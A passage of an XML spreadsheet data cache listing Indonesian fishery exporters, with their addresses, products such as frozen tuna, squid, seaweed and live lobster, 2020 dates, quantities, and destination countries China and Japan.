    <s v="Japan"/>
  </r>
  <r>
    <n v="20472"/>
    <x v="97"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG AMBON"/>
    <s v="Jl. Kapten Piere Tendean, Kel. Galala, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-04-27T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20473"/>
    <x v="97"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG AMBON"/>
    <s v="Jl. Kapten Piere Tendean, Kel. Galala, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-04-27T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21199"/>
    <x v="310"/>
    <s v="PT. INDUSTRI PERIKANAN NAMATOTA"/>
    <s v="Kampung Namatota, Distrik Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="35000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21200"/>
    <x v="310"/>
    <s v="PT. INDUSTRI PERIKANAN NAMATOTA"/>
    <s v="Kampung Namatota, Distrik Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Lencam, Senangin, Kerapu, Layur, Bawal, Kakap, Kuro, Kurisi)"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21201"/>
    <x v="310"/>
    <s v="PT. INDUSTRI PERIKANAN NAMATOTA"/>
    <s v="Kampung Namatota, Distrik Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21202"/>
    <x v="310"/>
    <s v="PT. INDUSTRI PERIKANAN NAMATOTA"/>
    <s v="Kampung Namatota, Distrik Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Udang Beku"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19992"/>
    <x v="311"/>
    <s v="KOPERASI HASIL BERKAT LAUTAN INDONESIA"/>
    <s v="Jl. Tanjung Pasir RT 21, Kel. Mamburungan, Kec. Tarakan Timur, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-05-06T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Surabaya, Kota Makassar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19560"/>
    <x v="312"/>
    <s v="PT. CENTRAM"/>
    <s v="Desa Carat, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Carrageenan"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="700000"/>
    <s v="Kabupaten Tangerang"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20483"/>
    <x v="313"/>
    <s v="PT. HIDUP SAMUDERA JAYA"/>
    <s v="Wilayah Jaga IX, Desa Maumbi, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Lobster Hidup"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20484"/>
    <x v="313"/>
    <s v="PT. HIDUP SAMUDERA JAYA"/>
    <s v="Wilayah Jaga IX, Desa Maumbi, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20485"/>
    <x v="313"/>
    <s v="PT. HIDUP SAMUDERA JAYA"/>
    <s v="Wilayah Jaga IX, Desa Maumbi, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Hidup"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20486"/>
    <x v="313"/>
    <s v="PT. HIDUP SAMUDERA JAYA"/>
    <s v="Wilayah Jaga IX, Desa Maumbi, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Teripang Kering"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="16900"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Cold Storage No 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-03-09T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="16901"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Cold Storage No 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kakap Merah)"/>
    <d v="2020-03-09T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="16902"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Cold Storage No 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Layang, Salem)"/>
    <d v="2020-03-09T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19312"/>
    <x v="315"/>
    <s v="PT. COLDSTORINDO JAYA PERKASA"/>
    <s v="Jl. Muara Baru Ujung Blok Heritage Mercusuar Kav 3 Room 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-01-29T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19314"/>
    <x v="316"/>
    <s v="PT. MARINA JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok N1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Panni, Tongkol, Kembung, Kawabida, Malalugis, Layang, Cakalang, Salem)"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19315"/>
    <x v="316"/>
    <s v="PT. MARINA JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok N1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19316"/>
    <x v="316"/>
    <s v="PT. MARINA JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok N1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19373"/>
    <x v="315"/>
    <s v="PT. COLDSTORINDO JAYA PERKASA"/>
    <s v="Jl. Muara Baru Ujung Blok Heritage Mercusuar Kav 3 Room 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Salem)"/>
    <d v="2020-01-29T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19379"/>
    <x v="317"/>
    <s v="CV. WAN QIAN"/>
    <s v="Duta Bandara Permai Blok ZU 5 No.1-3, Kel. Jati Mulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Hidup"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19543"/>
    <x v="318"/>
    <s v="PT. LAUTAN SAKTI JAYA"/>
    <s v="Jl. Rungkut Industri X/1, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19544"/>
    <x v="318"/>
    <s v="PT. LAUTAN SAKTI JAYA"/>
    <s v="Jl. Rungkut Industri X/1, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="700000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19545"/>
    <x v="318"/>
    <s v="PT. LAUTAN SAKTI JAYA"/>
    <s v="Jl. Rungkut Industri X/1, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barramundi, Lencam, Kuniran, Kerapu, Layur, Sukang, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="700000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19546"/>
    <x v="318"/>
    <s v="PT. LAUTAN SAKTI JAYA"/>
    <s v="Jl. Rungkut Industri X/1, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Tenggiri)"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19547"/>
    <x v="318"/>
    <s v="PT. LAUTAN SAKTI JAYA"/>
    <s v="Jl. Rungkut Industri X/1, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20081"/>
    <x v="319"/>
    <s v="PT. SEGAR LARIS NIAGA"/>
    <s v="Jl. Raya Cakung Cilincing No.118 B, Kel. Semper Barat, Kec. Cilincing, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi, Sotong)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20082"/>
    <x v="319"/>
    <s v="PT. SEGAR LARIS NIAGA"/>
    <s v="Jl. Raya Cakung Cilincing No.118 B, Kel. Semper Barat, Kec. Cilincing, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Barramundi, Remang, Lencam, Layur, Kakap, Kerapu)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20083"/>
    <x v="319"/>
    <s v="PT. SEGAR LARIS NIAGA"/>
    <s v="Jl. Raya Cakung Cilincing No.118 B, Kel. Semper Barat, Kec. Cilincing, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Cakalang, Salem, Lemuru, Kembung, Lemadang, Deho, Muroaji)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20258"/>
    <x v="53"/>
    <s v="PT. UNITED OCEANS WORLDWIDE"/>
    <s v="Jl. Semampar No.1 Komplek Workshop PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20464"/>
    <x v="320"/>
    <s v="CV. YELIN SHAN HANG"/>
    <s v="Jl. Mutiara Margomulyo Indah Blok K No.21, Kel. Manukan Wetan, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="60"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20465"/>
    <x v="320"/>
    <s v="CV. YELIN SHAN HANG"/>
    <s v="Jl. Mutiara Margomulyo Indah Blok K No.21, Kel. Manukan Wetan, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="60"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20466"/>
    <x v="320"/>
    <s v="CV. YELIN SHAN HANG"/>
    <s v="Jl. Mutiara Margomulyo Indah Blok K No.21, Kel. Manukan Wetan, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="60"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20602"/>
    <x v="321"/>
    <s v="PT. TRITOBA SAMUDERA INDONESIA"/>
    <s v="Jl. Muara Baru Ujung No 1,2,11,12 RT 020 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20782"/>
    <x v="322"/>
    <s v="PT. FISHING TRADE INTERNATIONAL"/>
    <s v="Lingkungan III RT 013 RW 003, Kel. Madidir Unet, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-06-03T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20919"/>
    <x v="209"/>
    <s v="PT. NUTRINDO FRESFOOD INTERNASIONAL"/>
    <s v="Lingkungan I, Kel. Tanjung Merah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Marlin, Pedang)"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21149"/>
    <x v="16"/>
    <s v="PT. LAURA INDO"/>
    <s v="Jl. Sabar Jaya No. 59, Kel. Prajen, Kec. Banyuasin, Kabupaten Banyuasin&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Ikan Demersal Beku (Malong, Layur)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21308"/>
    <x v="323"/>
    <s v="PT. MUARA JAYA ELOK"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke No.24, 26, 26A, 27, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21309"/>
    <x v="323"/>
    <s v="PT. MUARA JAYA ELOK"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke No.24, 26, 26A, 27, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21310"/>
    <x v="323"/>
    <s v="PT. MUARA JAYA ELOK"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke No.24, 26, 26A, 27, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Samge, Cunang)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21350"/>
    <x v="324"/>
    <s v="PT, YIN JING INTERNASIONAL"/>
    <s v="Jl, Kima 3 Kav S-13, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <s v="385,704,80"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21369"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="16843"/>
    <x v="325"/>
    <s v="PT, HASIL INDO SEJAHTERA"/>
    <s v="Jl, Ir, Sutami, Kompleks Pergudangan Karunia Sulawesi Blok G8, Kel, Parangloe, Kec, Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-01-09T00:00:00"/>
    <n v="3092591000"/>
    <s v="Kabupaten Pinrang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19424"/>
    <x v="326"/>
    <s v="PT. FLYING FISH ALGAE"/>
    <s v="Jl. Ir. Sutami No.19, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="3000000"/>
    <s v="Kabupaten Pinrang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19982"/>
    <x v="327"/>
    <s v="PT. CENTRAL PULAU LAUT"/>
    <s v="Pergudangan 88 Pattene Blok AF No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-03-09T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Pinrang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21090"/>
    <x v="328"/>
    <s v="PT. SAMUDERA INDONESIA COLDSTORINDO"/>
    <s v="Kawasan Industri Karyadeka Panca Murni Kav C2 Kp. Pasir Konci RT 015 RW 005, Kel. Pasir Sari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="3000"/>
    <s v="Kabupaten Bekasi"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21147"/>
    <x v="16"/>
    <s v="PT. LAURA INDO"/>
    <s v="Jl. Sabar Jaya No.59, Kel. Prajen, Kec. Banyuasin, Kabupaten Banyuasin&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Ikan Hasil Budidaya Beku (Bandeng)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Palembang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="16699"/>
    <x v="329"/>
    <s v="PT. MAYA FOOD INDUSTRIES"/>
    <s v="Jl. Jlamprang Krapyak Lor Blok S Tembok RT 004 RW 002, Kel. Krapyak , Kec. Pekalongan Utara , Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tembang, Sarden, Layang)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Semarang"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="16872"/>
    <x v="330"/>
    <s v="PT, FUDA SARI LAUT"/>
    <s v="Jl, M, Yakub Lubis No,99/I Dusun III, Kel, Bandar Khalifah, Kec, Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="16873"/>
    <x v="330"/>
    <s v="PT, FUDA SARI LAUT"/>
    <s v="Jl, M, Yakub Lubis No,99/I Dusun III, Kel, Bandar Khalifah, Kec, Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="17454"/>
    <x v="331"/>
    <s v="PT. OCEAN MEGA PERSADA"/>
    <s v="Ruko Klampis Square C-28, Kel. Klampis Ngasem, Kec. Sukolilo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="18187"/>
    <x v="332"/>
    <s v="CV. INDO OCEAN"/>
    <s v="Kp. Kojan RT 007 RW 006, Kel. Kalideres, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Denpasar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19376"/>
    <x v="317"/>
    <s v="CV. WAN QIAN"/>
    <s v="Duta Bandara Permai Blok ZU 5 No.1-3, Kel. Jati Mulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Denpasar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19377"/>
    <x v="317"/>
    <s v="CV. WAN QIAN"/>
    <s v="Duta Bandara Permai Blok ZU 5 No.1-3, Kel. Jati Mulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Denpasar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19410"/>
    <x v="317"/>
    <s v="CV. WAN QIAN"/>
    <s v="Duta Bandara Permai Blok ZU 5 No.1-3, Kel. Jati Mulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Denpasar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19815"/>
    <x v="333"/>
    <s v="PT. HARAPAN AHIAN JAYA"/>
    <s v="Jl. Udang Area Muara Baru Center Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-Cumi)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19817"/>
    <x v="333"/>
    <s v="PT. HARAPAN AHIAN JAYA"/>
    <s v="Jl. Udang Area Muara Baru Center Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Baby Tuna, Lemuru, Kakap Putih, Bawal Hitam, Senangin, Jahan, Kuwe, Tembang, Kerapu, Layur, Bawal)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19996"/>
    <x v="334"/>
    <s v="UD. TOKO WALET NUSANTARA"/>
    <s v="Jl. Diponegoro No.150 Blok A21, Kel. Dauh Puri Kelod, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-04-13T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Denpasar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19997"/>
    <x v="334"/>
    <s v="UD. TOKO WALET NUSANTARA"/>
    <s v="Jl. Diponegoro No.150 Blok A21, Kel. Dauh Puri Kelod, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Teripang Kering"/>
    <d v="2020-04-13T00:00:00"/>
    <n v="200"/>
    <s v="Kota Denpasar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="19998"/>
    <x v="334"/>
    <s v="UD. TOKO WALET NUSANTARA"/>
    <s v="Jl. Diponegoro No.150 Blok A21, Kel. Dauh Puri Kelod, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Abalone Kering, Scallop Kering"/>
    <d v="2020-04-13T00:00:00"/>
    <n v="200"/>
    <s v="Kota Denpasar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20262"/>
    <x v="333"/>
    <s v="PT. HARAPAN AHIAN JAYA"/>
    <s v="Jl. Udang Area Muara Baru Center Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Talang-Talang, Kakap Merah, Layaran, Layang, Tenggiri, Lasi, Kuro, Tetengkek)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20568"/>
    <x v="86"/>
    <s v="PT. INDOSUKSES MANDIRI ABADI"/>
    <s v="Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Ikan Demersal Beku (Gulama, Kerapu, Kakatua, Kakap)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="20569"/>
    <x v="86"/>
    <s v="PT. INDOSUKSES MANDIRI ABADI"/>
